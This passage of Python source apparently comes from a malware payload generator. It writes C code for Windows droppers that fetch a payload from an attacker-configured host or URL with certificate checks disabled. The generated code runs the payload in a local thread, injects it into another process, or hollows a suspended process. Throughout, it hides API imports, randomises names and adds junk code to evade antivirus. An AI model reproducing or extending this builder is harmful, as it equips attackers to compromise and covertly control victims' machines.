    Ret_code += "$:START\n"

    # WindowsDefend(ModOpt) returns C text inserted between the START and
    # EVA markers; its content is defined elsewhere.
    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    if ModOpt["DynImport"] == True:

        # NOTE(review): the two handle names are generated and declared a
        # second time here, replacing the ModOpt values set before "$:START".
        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()
        NdcInternetOpenA = varname_creator()
        NdcInternetConnectA = varname_creator()
        NdcHttpOpenRequestA = varname_creator()
        NdcInternetSetOption = varname_creator()
        NdcHttpSendRequestA = varname_creator()
        NdcInternetReadFile = varname_creator()

        Ret_code += "HANDLE " + ModOpt[
            "NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt[
            "Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        # Each WinINet function is looked up by name with GetProcAddress and
        # called through a FARPROC, so the API names appear in the generated
        # source only as string literals.
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"

        # Lhost and Lport are pasted into the C text verbatim: the host as a
        # string literal, the port as a bare token.
        Ret_code += "FARPROC " + NdcInternetConnectA + " = GetProcAddress(" + Wininet + ", \"InternetConnectA\");\n"
        Ret_code += "HINTERNET " + RandhConnect + " = (HINTERNET)" + NdcInternetConnectA + "(" + RandhInternet + ", \"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        # The numeric dwFlags literal matches these wininet.h constants, in
        # order: INTERNET_FLAG_RELOAD, INTERNET_FLAG_NO_CACHE_WRITE,
        # INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_AUTO_REDIRECT,
        # INTERNET_FLAG_NO_UI, INTERNET_FLAG_SECURE,
        # INTERNET_FLAG_IGNORE_CERT_DATE_INVALID,
        # INTERNET_FLAG_IGNORE_CERT_CN_INVALID.
        Ret_code += "FARPROC " + NdcHttpOpenRequestA + " = GetProcAddress(" + Wininet + ", \"HttpOpenRequestA\");\n"
        Ret_code += "HINTERNET " + RandhRequest + " = (HINTERNET)" + NdcHttpOpenRequestA + "(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        # Security-flag literal, in order: SECURITY_FLAG_IGNORE_CERT_DATE_INVALID,
        # SECURITY_FLAG_IGNORE_CERT_CN_INVALID, SECURITY_FLAG_IGNORE_WRONG_USAGE,
        # SECURITY_FLAG_IGNORE_UNKNOWN_CA, SECURITY_FLAG_IGNORE_REVOCATION.
        # Together they disable the checks that would reject an untrusted,
        # mismatched, expired or revoked server certificate.
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"

        Ret_code += "FARPROC " + NdcInternetSetOption + " = GetProcAddress(" + Wininet + ", \"InternetSetOption\");\n"

        # The BOOL result of InternetSetOption is stored but not tested in
        # the text emitted by this function.
        Ret_code += "BOOL " + RandISOResult + " = " + NdcInternetSetOption + "(" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        # Win_MemLocal returns the C text that gives Randlpv its memory; the
        # allocation method and size are decided inside inject_utils.
        Ret_code += inject_utils.Win_MemLocal(ModOpt)

        # Write cursor into the receive buffer.
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"

        Ret_code += "FARPROC " + NdcHttpSendRequestA + " = GetProcAddress(" + Wininet + ", \"HttpSendRequestA\");\n"
        Ret_code += "BOOL " + RandisSend + " = " + NdcHttpSendRequestA + "(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        Ret_code += "do{\n"
        # This branch reads 1024 bytes per call; the static-import branch
        # below uses 8192.
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhRequest + "," + Randpointer + ", 1024, &" + RandwByteRead + ");\n"

    else:

        # Static-import variant of the same sequence: the WinINet functions
        # are called directly by name, with the same flag literals as above.
        Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(NULL, INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhConnect + " = InternetConnectA(" + RandhInternet + ",\"" + ModOpt[
            "Lhost"] + "\"," + ModOpt[
                "Lport"] + ", NULL,NULL, INTERNET_SERVICE_HTTP,INTERNET_FLAG_SECURE,1);\n"
        Ret_code += "if (" + RandhConnect + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhRequest + " = HttpOpenRequestA(" + RandhConnect + ",NULL,\"" + UriGenerator(
        ) + "\",NULL, NULL, 0, 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000,1);\n"
        Ret_code += "if (" + RandhRequest + "!= NULL){\n"
        Ret_code += "DWORD " + RandwFlags + " = 0x00002000 | 0x00001000 | 0x00000200 | 0x00000100 | 0x00000080;\n"
        Ret_code += "BOOL " + RandISOResult + " = InternetSetOption (" + RandhRequest + ",INTERNET_OPTION_SECURITY_FLAGS, &" + RandwFlags + ", sizeof (" + RandwFlags + ") );\n"
        Ret_code += "LPVOID " + Randlpv + ";\n"

        Ret_code += inject_utils.Win_MemLocal(ModOpt)
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "BOOL " + RandisSend + " = HttpSendRequestA(" + RandhRequest + ", NULL, 0, NULL, 0);\n"
        Ret_code += "if (" + RandisSend + "){\n"
        Ret_code += "DWORD " + RandwByteRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhRequest + "," + Randpointer + ",8192, &" + RandwByteRead + ");\n"

    # Shared tail of the read loop for both branches: advance the cursor by
    # the number of bytes reported and repeat until a read reports zero. The
    # BOOL in RandisRead is not consulted by the loop condition.
    Ret_code += Randpointer + " += " + RandwByteRead + ";\n"
    Ret_code += "}while(" + RandwByteRead + " > 0);\n"

    # Only for allocators whose name contains "RW/" combined with local
    # thread execution: append the text returned by Win_ChangeMemProtect.
    # Presumably this changes the page protection of the downloaded buffer
    # before it is run -- confirm in inject_utils.
    if "RW/" in MemAlloc and ExecMethod == "Thread":

        Ret_code += inject_utils.Win_ChangeMemProtect(ModOpt)

    # Execution stage: "Thread" runs the buffer in the current process via
    # Win_LocalThread; every other ExecMethod value goes to
    # Win_RemoteInjection. Both emit C text defined in inject_utils.
    if ModOpt["ExecMethod"] == "Thread":

        Ret_code += inject_utils.Win_LocalThread(ModOpt)
    else:
        Ret_code += inject_utils.Win_RemoteInjection(ModOpt)

    # Closes the four nested `if` blocks opened above (session, connection,
    # request, send result).
    Ret_code += "}}}}\n"

    Ret_code += "$:END\n"

    #Ret_code += CloseDecoyProc(ModOpt["DecoyProc"])

    # Post-process the whole text; JunkInjector's transformation and the
    # meaning of the JI/JF/EF/JR options are defined elsewhere.
    Ret_code = JunkInjector(Ret_code, ModOpt["JI"], ModOpt["JF"], ModOpt["EF"],
                            ModOpt["JR"])

    # Appended after JunkInjector has run: close main(), or close the
    # DLL_PROCESS_ATTACH block and DllMain.
    if ModOpt["Outformat"] == "exe":

        Ret_code += "return 0;}"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "}\n"
        Ret_code += "return bReturnValue;}\n"

    WriteSource("Source.c", Ret_code)
def DownloadExecExe_C_windows(ModOpt):

    UrlTarget = ModOpt["UrlTarget"]
    Filesize = ModOpt["Filesize"]

    RandvarFsize = varname_creator()
    Randsi = varname_creator()
    Randpi = varname_creator()
    RandTcontext = varname_creator()
    Randlpv = varname_creator()
    Randpointer = varname_creator()
    RandhInternet = varname_creator()
    RandhURL = varname_creator()
    RandvarBRead = varname_creator()
    RandvarBWritten = varname_creator()
    RandisRead = varname_creator()
    RandImgDosHeader = varname_creator()
    RandImgNTHeader = varname_creator()
    RandImgSectHeader = varname_creator()
    NdcNtUnmapViewofSection = varname_creator()
    RandlpProcImgBAddr = varname_creator()
    RandlpNewImgBAddr = varname_creator()
    RandrelocData = varname_creator()
    RandDelta = varname_creator()
    Randflag = varname_creator()
    Randflag2 = varname_creator()
    Randflag3 = varname_creator()
    RandSectName = varname_creator()
    RandRelocSectRawData = varname_creator()
    RandOffsetInRelocSect = varname_creator()
    RandEntryCount = varname_creator()
    RandPBlocks = varname_creator()
    RandFieldAddr = varname_creator()
    RandDwBuff = varname_creator()
    RandlOldProtect = varname_creator()
    RandlNewProtect = varname_creator()

    ModOpt["Lpvoid"] = Randlpv

    CryptFile(ModOpt)

    Ret_code = ""

    IncludeList = ["#include <stdlib.h>\n","#include <windows.h>\n","#include <stdio.h>\n","#include <string.h>\n","#include <time.h>\n","#include <math.h>\n"]

    Ret_code += IncludeShuffler(IncludeList)

    Ret_code += "#include <tlhelp32.h>\n"
    Ret_code += "#include <wininet.h>\n"

    #if ModOpt["ExecMethod"] in ["Chimera","C"]:

    #Ret_code += "#define CountRelocationEntries(dwBlockSize) (dwBlockSize - sizeof(BASE_RELOCATION_BLOCK)) / sizeof(BASE_RELOCATION_ENTRY)\n"

    if ModOpt["Outformat"] == "exe":

        Ret_code += "int main(int argc,char * argv[]){\n"

    elif ModOpt["Outformat"] == "dll":

        Ret_code += "BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD dwReason,LPVOID lpReserved){\n"
        Ret_code += "BOOL bReturnValue = TRUE;\n"
        Ret_code += "if(dwReason ==  DLL_PROCESS_ATTACH){\n"

    Ret_code += "$:START\n"

    Ret_code += WindowsDefend(ModOpt)

    #Ret_code += WindowsDecoyProc(ModOpt["DecoyProc"])

    Ret_code += "$:EVA\n"

    Ret_code += "STARTUPINFOA " + Randsi + ";\n"
    Ret_code += "PROCESS_INFORMATION " + Randpi + ";\n"
    Ret_code += "ZeroMemory(&" + Randsi + ", sizeof(" + Randsi + "));\n"
    Ret_code += Randsi + ".cb = sizeof(" + Randsi + ");\n"
    Ret_code += "ZeroMemory(&" + Randpi + ", sizeof(" + Randpi + "));\n"

    if ModOpt["DynImport"] == True:

        ModOpt["NtdllHandle"] = varname_creator()
        ModOpt["Ker32Handle"] = varname_creator()
        Wininet = varname_creator()

        Ret_code += "HANDLE " + ModOpt["NtdllHandle"] + " = GetModuleHandle(\"ntdll.dll\");\n"
        Ret_code += "HANDLE " + ModOpt["Ker32Handle"] + " = GetModuleHandle(\"kernel32.dll\");\n"
        Ret_code += "HANDLE " + Wininet + " = GetModuleHandle(\"wininet.dll\");\n"

    if ModOpt["ExecMethod"] in ["Chimera","C"]:

        RandhProcess = varname_creator()
        Randentry = varname_creator()
        RandProcsnapshot = varname_creator()
        Randlpv2 = varname_creator()

        Ret_code += "PROCESSENTRY32 " + Randentry + ";\n"
        Ret_code += Randentry + ".dwSize = sizeof(PROCESSENTRY32);\n"

        if ModOpt["DynImport"] == True:

            NdcTl32Snapshot = varname_creator()
            NdcProcess32First = varname_creator()
            NdcProcess32Next = varname_creator()
            NdcOpenProcess = varname_creator()

            Ret_code += "FARPROC " + NdcTl32Snapshot + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"CreateToolhelp32Snapshot\");\n"
            Ret_code += "HANDLE " + RandProcsnapshot + " = (HANDLE)" + NdcTl32Snapshot + "(TH32CS_SNAPPROCESS, 0);\n"
            Ret_code += "FARPROC " + NdcProcess32First + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32First\");\n"
            Ret_code += "FARPROC " + NdcProcess32Next + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"Process32Next\");\n"
            Ret_code += "FARPROC " + NdcOpenProcess + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ",\"OpenProcess\");\n"
            Ret_code += "if (" + NdcProcess32First + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "while (" + NdcProcess32Next + "(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
            Ret_code += "HANDLE " + RandhProcess + " = (HANDLE)" + NdcOpenProcess + "(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"
        else:
            Ret_code += "HANDLE " + RandProcsnapshot + " = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);\n"
            Ret_code += "if (Process32First(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "while (Process32Next(" + RandProcsnapshot + ", &" + Randentry + ") == TRUE){\n"
            Ret_code += "if(strcmp(" + Randentry + ".szExeFile, \"" + ModOpt["ProcTarget"] + "\") == 0){\n"
            Ret_code += "HANDLE " + RandhProcess + " = OpenProcess(PROCESS_ALL_ACCESS, FALSE, " + Randentry + ".th32ProcessID);\n"

    elif ModOpt["ExecMethod"] == "ProcessHollowing" or ModOpt["ExecMethod"] == "PH":

        if ModOpt["DynImport"] == True:
            NdcCreateProcessA = varname_creator()
            Ret_code += "FARPROC " + NdcCreateProcessA + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"CreateProcessA\");\n"
            Ret_code += NdcCreateProcessA + "(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"
        else:
            Ret_code += "CreateProcessA(0,\"" + ModOpt["ProcTarget"] + "\",0,0,0, CREATE_SUSPENDED,0,0,&" + Randsi + ",&" + Randpi + ");\n"

        Ret_code += "CONTEXT " + RandTcontext + ";\n"
        Ret_code += RandTcontext + ".ContextFlags = CONTEXT_FULL;\n"

        if ModOpt["DynImport"] == True:

            NdcGetThreadContext = varname_creator()
            Ret_code += "FARPROC " + NdcGetThreadContext + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"GetThreadContext\");\n"
            Ret_code += "if (" + NdcGetThreadContext + "(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"
        else:
            Ret_code += "if (GetThreadContext(" + Randpi + ".hThread,&" + RandTcontext + ") != 0){\n"

    Ret_code += "int " + RandvarFsize + " = " + ModOpt["Filesize"] + ";\n"
    Ret_code += "DWORD " + RandvarBWritten + " = 0;\n"

    if ModOpt["DynImport"] == True:
        NdcInternetOpenA = varname_creator()
        NdcInternetOpenUrl = varname_creator()
        NdcVirtualAlloc = varname_creator()
        NdcInternetReadFile = varname_creator()
 
        Ret_code += "FARPROC " + NdcInternetOpenA + " = GetProcAddress(" + Wininet + ", \"InternetOpenA\");\n"
        Ret_code += "HINTERNET " + RandhInternet + " = (HINTERNET)" + NdcInternetOpenA + "(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "FARPROC " + NdcInternetOpenUrl + " = GetProcAddress(" + Wininet + ", \"InternetOpenUrl\");\n"
        Ret_code += "HINTERNET " + RandhURL + " = (HINTERNET)" + NdcInternetOpenUrl + "(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
        Ret_code += "FARPROC " + NdcVirtualAlloc + " = GetProcAddress(" + Wininet + ", \"VirtualAlloc\");\n"
        Ret_code += "unsigned char * " + Randlpv + " = (LPVOID)" + NdcVirtualAlloc + "(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "FARPROC " + NdcInternetReadFile + " = GetProcAddress(" + Wininet + ", \"InternetReadFile\");\n"
        Ret_code += "BOOL " + RandisRead + " = " + NdcInternetReadFile + "(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"
    else:
        Ret_code += "HINTERNET " + RandhInternet + " = InternetOpenA(\"Mozilla/4.0\", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, 0);\n"
        Ret_code += "if (" + RandhInternet + " != NULL){\n"
        Ret_code += "HINTERNET " + RandhURL + " = InternetOpenUrl(" + RandhInternet + ",\"" + UrlTarget + "\",NULL, 0,INTERNET_FLAG_RESYNCHRONIZE, 0);\n"
        Ret_code += "unsigned char * " + Randlpv + " = VirtualAlloc(0," + RandvarFsize + ", MEM_COMMIT, PAGE_READWRITE);\n"
        Ret_code += "ZeroMemory(" + Randlpv + "," + RandvarFsize + ");\n"
        Ret_code += "char * " + Randpointer + " = " + Randlpv + ";\n"
        Ret_code += "DWORD " + RandvarBRead + ";\n"
        Ret_code += "do{\n"
        Ret_code += "BOOL " + RandisRead + " = InternetReadFile(" + RandhURL + "," + Randpointer + ", 1024, &" + RandvarBRead + ");\n"

    Ret_code += Randpointer + " += " + RandvarBRead + ";\n"
    Ret_code += "}while(" + RandvarBRead + " > 0);\n"

    if ModOpt["Decoder"] != "False":

        Ret_code += ModOpt["Decoder"]

    Ret_code += "typedef struct BASE_RELOCATION_BLOCK {"
    Ret_code += "DWORD PageAddress;"
    Ret_code += "DWORD BlockSize;"
    Ret_code += "} BASE_RELOCATION_BLOCK, *PBASE_RELOCATION_BLOCK;\n"

    Ret_code += "typedef struct BASE_RELOCATION_ENTRY {"
    Ret_code += "USHORT Offset : 12;"
    Ret_code += "USHORT Type : 4;"
    Ret_code += "} BASE_RELOCATION_ENTRY, *PBASE_RELOCATION_ENTRY;\n"

    Ret_code += "PIMAGE_DOS_HEADER " + RandImgDosHeader + ";\n"
    Ret_code += "PIMAGE_NT_HEADERS " + RandImgNTHeader + ";\n"
    Ret_code += "PIMAGE_SECTION_HEADER " + RandImgSectHeader + ";\n"
    Ret_code += RandImgDosHeader + " = (PIMAGE_DOS_HEADER)" + Randlpv + ";\n"


    if ModOpt["DynImport"] == True:

        NdcReadProcessMemory = varname_creator()
        NdcWriteProcessMemory = varname_creator()
        NdcVirtualAllocEx = varname_creator()
        NdcVirtualProtectEx = varname_creator()

        Ret_code += "FARPROC " + NdcReadProcessMemory + " = GetProcAddress(" + Wininet + ", \"ReadProcessMemory\");\n"
        Ret_code += "FARPROC " + NdcWriteProcessMemory + " = GetProcAddress(" + Wininet + ", \"WriteProcessMemory\");\n"
        Ret_code += "FARPROC " + NdcVirtualAllocEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualAllocEx\");\n"            
        Ret_code += "FARPROC " + NdcVirtualProtectEx + " = GetProcAddress(" + ModOpt["Ker32Handle"] + ", \"VirtualProtectEx\");\n"   


    if ModOpt["ExecMethod"] in ["ProcessHollowing","PH"]:

        Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
        Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n" 
        Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"

        if ModOpt["Arch"] == "x86":

            if ModOpt["DynImport"] == True:

                Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

            else:

                Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Ebx + 8), &" + RandlpProcImgBAddr + ", sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

        else:

            if ModOpt["DynImport"] == True:

                Ret_code += NdcReadProcessMemory + "(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n"  #if x64 proc

            else:
                Ret_code += "ReadProcessMemory(" + Randpi + ".hProcess,(PVOID)(" + RandTcontext+ ".Rdx+(sizeof(SIZE_T)*2)),&" + RandlpProcImgBAddr + ",sizeof(" + RandlpProcImgBAddr + "), NULL);\n"

        Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
        Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
        Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
        Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"

        if ModOpt["DynImport"] == True:

            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
            Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"
        else:
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + "){\n"
            Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"


    elif ModOpt["ExecMethod"] in ["Chimera","C"]:
        #Ret_code += "FARPROC " + NdcNtUnmapViewofSection + " = GetProcAddress(GetModuleHandle(\"ntdll.dll\"),\"NtUnmapViewOfSection\");\n"
        Ret_code += RandImgNTHeader + " = (PIMAGE_NT_HEADERS)((LPBYTE)" + Randlpv + " + " + RandImgDosHeader + "->e_lfanew);\n" 
        #Ret_code += "LPVOID " + RandlpProcImgBAddr + ";\n"
        Ret_code += "LPVOID " + RandlpNewImgBAddr + " = NULL;\n"
        Ret_code += "IMAGE_DATA_DIRECTORY " + RandrelocData + " = " + RandImgNTHeader + "->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];\n"
        Ret_code += "if(!(" + RandImgNTHeader + "->FileHeader.Characteristics & IMAGE_FILE_RELOCS_STRIPPED) && " + RandrelocData + ".VirtualAddress!=0 && " + RandrelocData + ".Size!=0){\n"
        #Ret_code += "if(!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + ")){\n"

        if ModOpt["DynImport"] == True:

            #Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            #Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = (LPVOID)" + NdcVirtualAllocEx + "(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
            #Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            #Ret_code += RandlpNewImgBAddr + " = " + NdcVirtualAllocEx + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"

        else:
            #Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess," + RandlpProcImgBAddr + "," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            #Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,NULL," + RandImgNTHeader + "->OptionalHeader.SizeOfImage, MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "}else{\n"
            Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess, (PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);\n"
            Ret_code += "if(!" + RandlpNewImgBAddr + ")return -1;}\n"
            #Ret_code += "if (!" + NdcNtUnmapViewofSection + "(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase))){\n"
            #Ret_code += RandlpNewImgBAddr + " = VirtualAllocEx(" + Randpi + ".hProcess,(PVOID)(" + RandImgNTHeader + "->OptionalHeader.ImageBase)," + RandImgNTHeader + "->OptionalHeader.SizeOfImage,MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE);}}}\n"


    Ret_code += "SIZE_T " + RandDelta + " = (SIZE_T)" + RandlpNewImgBAddr + "-" + RandImgNTHeader + "->OptionalHeader.ImageBase;\n"
    Ret_code += RandImgNTHeader + "->OptionalHeader.ImageBase = (SIZE_T)" + RandlpNewImgBAddr + ";\n"

    if ModOpt["DynImport"] == True:

        Ret_code += NdcWriteProcessMemory + "(" + Randpi + ".hProcess," + RandlpNewImgBAddr + "," + Randlpv + "," + RandImgNTHeader + "->OptionalHeader.SizeOfHeaders,NULL);\n"
        Ret_code += "for (int " + Randflag + "= 0;" + Randflag + "<" + RandImgNTHeader + "->FileHeader.NumberOfSections;" + Randflag + "++){\n"
